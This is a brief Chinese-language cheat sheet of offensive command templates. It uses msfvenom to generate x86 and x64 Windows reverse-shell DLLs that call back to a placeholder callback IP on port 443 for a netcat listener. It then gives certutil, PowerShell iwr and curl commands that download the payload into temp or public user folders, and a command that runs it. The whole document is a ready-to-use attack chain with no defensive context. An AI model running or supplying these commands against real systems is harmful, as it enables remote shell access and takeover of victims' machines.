msf生成nc可接收的443端口的反向shell，建议每次使用先执行第一条命令覆盖原有shell（因为回连ip会变）
>重新生成反向shell(x86)，覆盖原有shell
msfvenom -p windows/shell_reverse_tcp LHOST=$callback_ip LPORT=443 -f dll -o $toolfile
>重新生成反向shell(x64)，覆盖原有shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$callback_ip LPORT=443 -f dll -o $toolfile
>cmd执行下载shell的命令
certutil -urlcache -split -f $downloadurl C:\windows\temp\$badfile
>适用于temp目录不可写的时候，往公共用户目录写
certutil -urlcache -split -f $downloadurl C:\users\public\$badfile
> in powershell
iwr -uri $downloadurl -outfile C:\windows\temp\$badfile
>curl
curl $downloadurl -o C:\windows\temp\$badfile
>cmd执行反向shell
C:\windows\temp\$badfile
